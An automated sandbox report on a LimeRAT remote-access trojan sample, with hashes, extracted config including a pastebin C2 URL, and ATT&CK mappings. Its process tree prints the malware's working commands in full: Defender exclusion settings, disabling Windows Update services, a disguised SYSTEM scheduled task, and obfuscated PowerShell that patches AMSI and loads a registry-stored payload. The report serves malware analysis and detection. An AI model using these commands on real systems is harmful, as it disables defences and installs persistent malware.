limerat | d0fd88199448558df5b8c56936e822aea87f9149c23682004edbf36f28bfb78e

Analysis

max time kernel
13s
max time network
16s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
06-05-2022 07:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b1a6bd454f8e723bd8f1b856b336c844.exe
Size

13.4MB
MD5

b1a6bd454f8e723bd8f1b856b336c844
SHA1

e50b78534ab2761b9f654333f81be3a60f736eb9
SHA256

d0fd88199448558df5b8c56936e822aea87f9149c23682004edbf36f28bfb78e
SHA512

2bff70684886914c8affa398dda0f801dc22d8f7d0a2a4f2578378f387744c6548779fd2065c7ddde3757d4c3786c40b6006aa1a371ea0b0c1a0ef425ecccd80

Score

10^/10

limerat evasion rat vmprotect

Malware Config

Extracted

Family

limerat

Attributes

aes_key
1234
antivm
true
c2_url
https://pastebin.com/raw/nFP8Nq0E
delay
3
download_payload
false
install
true
install_name
whitelistcheck.exe
main_folder
AppData
pin_spread
false
sub_folder
\
usb_spread
false

Signatures

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat

NirSoft WebBrowserPassView 6 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\n.exe	WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\n.exe	WebBrowserPassView
behavioral2/memory/1520-153-0x0000000000520000-0x00000000009BC000-memory.dmp	WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe	WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe	WebBrowserPassView
behavioral2/memory/4448-173-0x0000000000180000-0x00000000005FA000-memory.dmp	WebBrowserPassView

Nirsoft 6 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\n.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\n.exe	Nirsoft
behavioral2/memory/1520-153-0x0000000000520000-0x00000000009BC000-memory.dmp	Nirsoft
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe	Nirsoft
behavioral2/memory/4448-173-0x0000000000180000-0x00000000005FA000-memory.dmp	Nirsoft

Executes dropped EXE 1 IoCs

Processes:

New-Client-Test.exe

pid process

1064 New-Client-Test.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1064	New-Client-Test.exe

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/4540-130-0x0000000000400000-0x0000000001D56000-memory.dmp	vmprotect

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

b1a6bd454f8e723bd8f1b856b336c844.exe

pid process

4540 b1a6bd454f8e723bd8f1b856b336c844.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3256 schtasks.exe
Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

4800 reg.exe
3560 reg.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

b1a6bd454f8e723bd8f1b856b336c844.exe

pid process

4540 b1a6bd454f8e723bd8f1b856b336c844.exe
4540 b1a6bd454f8e723bd8f1b856b336c844.exe

pid	process
4540	b1a6bd454f8e723bd8f1b856b336c844.exe

pid	process
3256	schtasks.exe

pid	process
4800	reg.exe
3560	reg.exe

pid	process
4540	b1a6bd454f8e723bd8f1b856b336c844.exe
4540	b1a6bd454f8e723bd8f1b856b336c844.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

b1a6bd454f8e723bd8f1b856b336c844.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4540 wrote to memory of 4184	4540	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 4540 wrote to memory of 4184	4540	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 4540 wrote to memory of 4184	4540	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 4540 wrote to memory of 608	4540	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 4540 wrote to memory of 608	4540	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 4540 wrote to memory of 608	4540	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 4540 wrote to memory of 2324	4540	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 4540 wrote to memory of 2324	4540	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 4540 wrote to memory of 2324	4540	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 4540 wrote to memory of 3164	4540	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 4540 wrote to memory of 3164	4540	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 4540 wrote to memory of 3164	4540	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 4540 wrote to memory of 2404	4540	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 4540 wrote to memory of 2404	4540	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 4540 wrote to memory of 2404	4540	b1a6bd454f8e723bd8f1b856b336c844.exe	cmd.exe
PID 608 wrote to memory of 1064	608	cmd.exe	New-Client-Test.exe
PID 608 wrote to memory of 1064	608	cmd.exe	New-Client-Test.exe
PID 608 wrote to memory of 1064	608	cmd.exe	New-Client-Test.exe
PID 2404 wrote to memory of 1236	2404	cmd.exe	menu.exe
PID 2404 wrote to memory of 1236	2404	cmd.exe	menu.exe
PID 2404 wrote to memory of 1236	2404	cmd.exe	menu.exe
PID 3164 wrote to memory of 1520	3164	cmd.exe	n.exe
PID 3164 wrote to memory of 1520	3164	cmd.exe	n.exe
PID 3164 wrote to memory of 1520	3164	cmd.exe	n.exe
PID 2324 wrote to memory of 1364	2324	cmd.exe	protected.exe
PID 2324 wrote to memory of 1364	2324	cmd.exe	protected.exe
PID 4184 wrote to memory of 4492	4184	cmd.exe	powershell.exe
PID 4184 wrote to memory of 4492	4184	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\b1a6bd454f8e723bd8f1b856b336c844.exe
"C:\Users\Admin\AppData\Local\Temp\b1a6bd454f8e723bd8f1b856b336c844.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4540

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
2⤵
- Suspicious use of WriteProcessMemory
PID:4184

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
3⤵
PID:4492

C:\Windows\SysWOW64\cmd.exe
cmd /c start "" "C:\Users\Admin\AppData\Local\Temp\New-Client-Test.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:608

C:\Users\Admin\AppData\Local\Temp\New-Client-Test.exe
"C:\Users\Admin\AppData\Local\Temp\New-Client-Test.exe"
3⤵
- Executes dropped EXE
PID:1064

C:\Windows\SysWOW64\cmd.exe
cmd /c start "" "C:\Users\Admin\AppData\Local\Temp\protected.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2324

C:\Users\Admin\AppData\Local\Temp\protected.exe
"C:\Users\Admin\AppData\Local\Temp\protected.exe"
3⤵
PID:1364

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\protected.exe"
4⤵
PID:4496

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHYAcQBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcAB0AGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQB0AGkAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBvAGMAdgAjAD4A"
5⤵
PID:5080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHYAcQBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcAB0AGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQB0AGkAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBvAGMAdgAjAD4A"
6⤵
PID:2156

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:3600

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
PID:2596

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
PID:1372

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
PID:2440

C:\Windows\system32\sc.exe
sc stop bits
6⤵
PID:2456

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
PID:1968

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:4800

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:3560

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
5⤵
PID:3944

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
6⤵
PID:1096

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
6⤵
PID:2720

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
6⤵
PID:452

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
6⤵
PID:3220

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
5⤵
PID:3652

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
5⤵
PID:3712

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
6⤵
- Creates scheduled task(s)
PID:3256

C:\Windows\SysWOW64\cmd.exe
cmd /c start "" "C:\Users\Admin\AppData\Local\Temp\n.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:3164

C:\Users\Admin\AppData\Local\Temp\n.exe
"C:\Users\Admin\AppData\Local\Temp\n.exe"
3⤵
PID:1520

C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4PnZTFPlWNL2sBxEj3K0lfm+IpmDl1fWL91EsjtUdV9gePUMFukpx1w8bbbUgxdWL/O2Y/SoYLyHJ0UL+yd4I6Qo2xAsTPBudxn8AP93T31cVHxeQT3kKahuJ43jbU6z8=
4⤵
PID:4448

C:\Windows\SysWOW64\cmd.exe
cmd /c start "" "C:\Users\Admin\AppData\Local\Temp\menu.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2404

C:\Users\Admin\AppData\Local\Temp\menu.exe
"C:\Users\Admin\AppData\Local\Temp\menu.exe"
3⤵
PID:1236

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8590.tmp\8591.tmp\8592.bat C:\Users\Admin\AppData\Local\Temp\menu.exe"
4⤵
PID:2264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\menu.exe"
5⤵
PID:4344

C:\Windows\system32\findstr.exe
findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\menu.exe"
6⤵
PID:4116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:EPFTruWUFcDm{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IRcvsgzuilNmDP,[Parameter(Position=1)][Type]$uyYTSxAOAF)$bkchzoMBaok=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$bkchzoMBaok.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$IRcvsgzuilNmDP).SetImplementationFlags('Runtime,Managed');$bkchzoMBaok.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$uyYTSxAOAF,$IRcvsgzuilNmDP).SetImplementationFlags('Runtime,Managed');Write-Output $bkchzoMBaok.CreateType();}$uaDUVGyusBOue=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$PpzwOIPQqnuHPL=$uaDUVGyusBOue.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KjfZOdHkAEmtMuAsGVz=EPFTruWUFcDm @([String])([IntPtr]);$SMMITyPzTvqaqVcDvSAfJA=EPFTruWUFcDm @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$fjKKXanmJZW=$uaDUVGyusBOue.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$EHGtVIDpwtJAmQ=$PpzwOIPQqnuHPL.Invoke($Null,@([Object]$fjKKXanmJZW,[Object]('Load'+'LibraryA')));$IYtjumAXlndSLJOZT=$PpzwOIPQqnuHPL.Invoke($Null,@([Object]$fjKKXanmJZW,[Object]('Vir'+'tual'+'Pro'+'tect')));$aVJlHUn=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EHGtVIDpwtJAmQ,$KjfZOdHkAEmtMuAsGVz).Invoke('a'+'m'+'si.dll');$iVMrDpXVrgiNJHzuT=$PpzwOIPQqnuHPL.Invoke($Null,@([Object]$aVJlHUn,[Object]('Ams'+'iSc'+'an'+'Buffer')));$WBnyungvCC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IYtjumAXlndSLJOZT,$SMMITyPzTvqaqVcDvSAfJA).Invoke($iVMrDpXVrgiNJHzuT,[uint32]8,4,[ref]$WBnyungvCC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iVMrDpXVrgiNJHzuT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IYtjumAXlndSLJOZT,$SMMITyPzTvqaqVcDvSAfJA).Invoke($iVMrDpXVrgiNJHzuT,[uint32]8,0x20,[ref]$WBnyungvCC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
1⤵
PID:2672

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:hSIJNVtESMjK{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OEzJzvXPepaOIj,[Parameter(Position=1)][Type]$jMjrzFRknb)$XcfqGacJjgA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$XcfqGacJjgA.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$OEzJzvXPepaOIj).SetImplementationFlags('Runtime,Managed');$XcfqGacJjgA.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jMjrzFRknb,$OEzJzvXPepaOIj).SetImplementationFlags('Runtime,Managed');Write-Output $XcfqGacJjgA.CreateType();}$JEHwPnEYOSzcB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$YxAvcFUNwQthjT=$JEHwPnEYOSzcB.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$uAeUqQUBpQaooYHETna=hSIJNVtESMjK @([String])([IntPtr]);$lhCaFjoomvCnqwTNAraVPC=hSIJNVtESMjK @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cWRSWBjOZCm=$JEHwPnEYOSzcB.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$WAAgBHGkNjgPgd=$YxAvcFUNwQthjT.Invoke($Null,@([Object]$cWRSWBjOZCm,[Object]('Load'+'LibraryA')));$vzpqIFYuIFSuCwGtR=$YxAvcFUNwQthjT.Invoke($Null,@([Object]$cWRSWBjOZCm,[Object]('Vir'+'tual'+'Pro'+'tect')));$YNVQCfC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WAAgBHGkNjgPgd,$uAeUqQUBpQaooYHETna).Invoke('a'+'m'+'si.dll');$EBlTFhkgrlmYKAgtS=$YxAvcFUNwQthjT.Invoke($Null,@([Object]$YNVQCfC,[Object]('Ams'+'iSc'+'an'+'Buffer')));$SMnnScKiMP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vzpqIFYuIFSuCwGtR,$lhCaFjoomvCnqwTNAraVPC).Invoke($EBlTFhkgrlmYKAgtS,[uint32]8,4,[ref]$SMnnScKiMP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$EBlTFhkgrlmYKAgtS,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vzpqIFYuIFSuCwGtR,$lhCaFjoomvCnqwTNAraVPC).Invoke($EBlTFhkgrlmYKAgtS,[uint32]8,0x20,[ref]$SMnnScKiMP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
1⤵
PID:3228

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8590.tmp\8591.tmp\8592.bat
Filesize
1KB

MD5
e1bb09383bc07bceda851a5493b9f56f

SHA1
175ffc74d169f99fed6f6296791d7ac48311b3e1

SHA256
43994d120fec720a17cb4c5896456346c2a049c1d99be3125249929a76041851

SHA512
fa23b11844cb59cd3940fa05d5244e33b84d4a58d98844e221b79bd2e415cd3e70d82515f705bea6ab4cc3930e773930119d0e90b1cd48e2cad0e927f86b305e

Download Submit
C:\Users\Admin\AppData\Local\Temp\New-Client-Test.exe
Filesize
28KB

MD5
9db028ef92251d3475aa97b3f4b91536

SHA1
6be1dcadecc2b6f7f071f0812298607e5e1996a0

SHA256
03b452e1d1d5a5885a4130370a0418ea65d616f0e2032877c0fb9556c510942f

SHA512
0db98918487cb37d86a7b01d40436599c5e08028c244d19b44f990b5a6df1db504cfe26a046c2959c81a485268c9138b9bc37271b41b66f5b281b9a3cf57e31b

Download Submit
C:\Users\Admin\AppData\Local\Temp\New-Client-Test.exe
Filesize
28KB

MD5
9db028ef92251d3475aa97b3f4b91536

SHA1
6be1dcadecc2b6f7f071f0812298607e5e1996a0

SHA256
03b452e1d1d5a5885a4130370a0418ea65d616f0e2032877c0fb9556c510942f

SHA512
0db98918487cb37d86a7b01d40436599c5e08028c244d19b44f990b5a6df1db504cfe26a046c2959c81a485268c9138b9bc37271b41b66f5b281b9a3cf57e31b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
Filesize
4.4MB

MD5
3405f654559010ca2ae38d786389f0f1

SHA1
8ac5552c64dfc3ccf0c678f6f946ee23719cf43d

SHA256
bc1364d8e68f515f9f35a6b41c11a649b1f514302eb01812c68c9a95a3198b30

SHA512
cb1e5ffed2ab86502ea4236383e9a4211a14b1abda13babbcceea67700c5746b37b4da6e45e10196eb76fa1e6959e71f19c6827466a54df1d5ba5ad2e16fc05b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
Filesize
4.4MB

MD5
3405f654559010ca2ae38d786389f0f1

SHA1
8ac5552c64dfc3ccf0c678f6f946ee23719cf43d

SHA256
bc1364d8e68f515f9f35a6b41c11a649b1f514302eb01812c68c9a95a3198b30

SHA512
cb1e5ffed2ab86502ea4236383e9a4211a14b1abda13babbcceea67700c5746b37b4da6e45e10196eb76fa1e6959e71f19c6827466a54df1d5ba5ad2e16fc05b

Download Submit
C:\Users\Admin\AppData\Local\Temp\config
Filesize
108B

MD5
1ba367d0f9aac0f650e65ab7401776c0

SHA1
75cf3295125cfaa0c247ebccc57e63f915198683

SHA256
68c4ec552c98f3b5a4744e4eefadd6364dc8075c2e718b7bcbfc76625aa60d03

SHA512
45ccdf02314fe01948aa2ecddb3b50f68d5b32d8542e3a3aeaf3f2920e2285d3b75ebb81b9eb9fb9e0a446af5a3708720e07672874d5d38871dbdcd09483449c

Download Submit
C:\Users\Admin\AppData\Local\Temp\menu.exe
Filesize
90KB

MD5
df1a652f5f40127d986a4ee1742c5f71

SHA1
1fe492fb25950e47e3b1480820a530b4a60aefe1

SHA256
8889ceb7015576ae3c026b39beb8b1dc620ef0c921ad4fc0ea7fd471ca7dc317

SHA512
fff5a34e316856bf3ff382a4420d3fa7b84eff0018530893328f7e838d7621e43102b91764f522b6f71986b5931c5e322a8da1ba173d2f8dc5a4ed563b44da8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\menu.exe
Filesize
90KB

MD5
df1a652f5f40127d986a4ee1742c5f71

SHA1
1fe492fb25950e47e3b1480820a530b4a60aefe1

SHA256
8889ceb7015576ae3c026b39beb8b1dc620ef0c921ad4fc0ea7fd471ca7dc317

SHA512
fff5a34e316856bf3ff382a4420d3fa7b84eff0018530893328f7e838d7621e43102b91764f522b6f71986b5931c5e322a8da1ba173d2f8dc5a4ed563b44da8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\n.exe
Filesize
4.6MB

MD5
fc2c9d4e84cff08b3b8160b091e72072

SHA1
0dbb89f0ce90cc26cbff09073949cf1e4b6559d9

SHA256
1b09ad4d930bb5f1fb4fca4b2603e33b40884ab32f46a61d71cb57ab2d05e140

SHA512
29d164548bc8b189154484d35bc12f8582213196dee71105e1a78ce0e8bfc4e5a483fa2df49b55def044be8c8b4b6685aed096f3d29fa9e51167b4bca2e2ad27

Download Submit
C:\Users\Admin\AppData\Local\Temp\n.exe
Filesize
4.6MB

MD5
fc2c9d4e84cff08b3b8160b091e72072

SHA1
0dbb89f0ce90cc26cbff09073949cf1e4b6559d9

SHA256
1b09ad4d930bb5f1fb4fca4b2603e33b40884ab32f46a61d71cb57ab2d05e140

SHA512
29d164548bc8b189154484d35bc12f8582213196dee71105e1a78ce0e8bfc4e5a483fa2df49b55def044be8c8b4b6685aed096f3d29fa9e51167b4bca2e2ad27

Download Submit
C:\Users\Admin\AppData\Local\Temp\protected.exe
Filesize
4.4MB

MD5
0514c96bcd5d4fb0cee8865fd32c1ba3

SHA1
cd24d7547bb47d87430ab627cca5c8c4acf58971

SHA256
9a427506761771ae017ec3bc96b12b3d49ab5f6a2c64b48b429c9d14cee10489

SHA512
2bbaddd521e77783805231d0f0afcc6a802d7140d8d857770f7bcb46cbc88555ac9e39974a4ddb50b685eb7a529de5c006b1d53ec5da708d632fa027c73d143e

Download Submit
C:\Users\Admin\AppData\Local\Temp\protected.exe
Filesize
4.4MB

MD5
0514c96bcd5d4fb0cee8865fd32c1ba3

SHA1
cd24d7547bb47d87430ab627cca5c8c4acf58971

SHA256
9a427506761771ae017ec3bc96b12b3d49ab5f6a2c64b48b429c9d14cee10489

SHA512
2bbaddd521e77783805231d0f0afcc6a802d7140d8d857770f7bcb46cbc88555ac9e39974a4ddb50b685eb7a529de5c006b1d53ec5da708d632fa027c73d143e

Download Submit
memory/452-195-0x0000000000000000-mapping.dmp

Download
memory/608-133-0x0000000000000000-mapping.dmp

Download
memory/1064-152-0x0000000000FF0000-0x0000000000FFC000-memory.dmp

Filesize
48KB

Download
memory/1064-137-0x0000000000000000-mapping.dmp

Download
memory/1064-155-0x0000000005990000-0x0000000005A2C000-memory.dmp

Filesize
624KB

Download
memory/1096-188-0x0000000000000000-mapping.dmp

Download
memory/1236-140-0x0000000000000000-mapping.dmp

Download
memory/1364-142-0x0000000000000000-mapping.dmp

Download
memory/1372-191-0x0000000000000000-mapping.dmp

Download
memory/1520-153-0x0000000000520000-0x00000000009BC000-memory.dmp

Filesize
4.6MB

Download
memory/1520-141-0x0000000000000000-mapping.dmp

Download
memory/1520-160-0x00000000051C0000-0x0000000005226000-memory.dmp

Filesize
408KB

Download
memory/1520-159-0x0000000005570000-0x0000000005B14000-memory.dmp

Filesize
5.6MB

Download
memory/1968-201-0x0000000000000000-mapping.dmp

Download
memory/2156-168-0x0000025CF5E00000-0x0000025CF5E22000-memory.dmp

Filesize
136KB

Download
memory/2156-167-0x0000000000000000-mapping.dmp

Download
memory/2156-169-0x00007FFB0FB70000-0x00007FFB10631000-memory.dmp

Filesize
10.8MB

Download
memory/2264-150-0x0000000000000000-mapping.dmp

Download
memory/2324-134-0x0000000000000000-mapping.dmp

Download
memory/2404-136-0x0000000000000000-mapping.dmp

Download
memory/2440-196-0x0000000000000000-mapping.dmp

Download
memory/2456-200-0x0000000000000000-mapping.dmp

Download
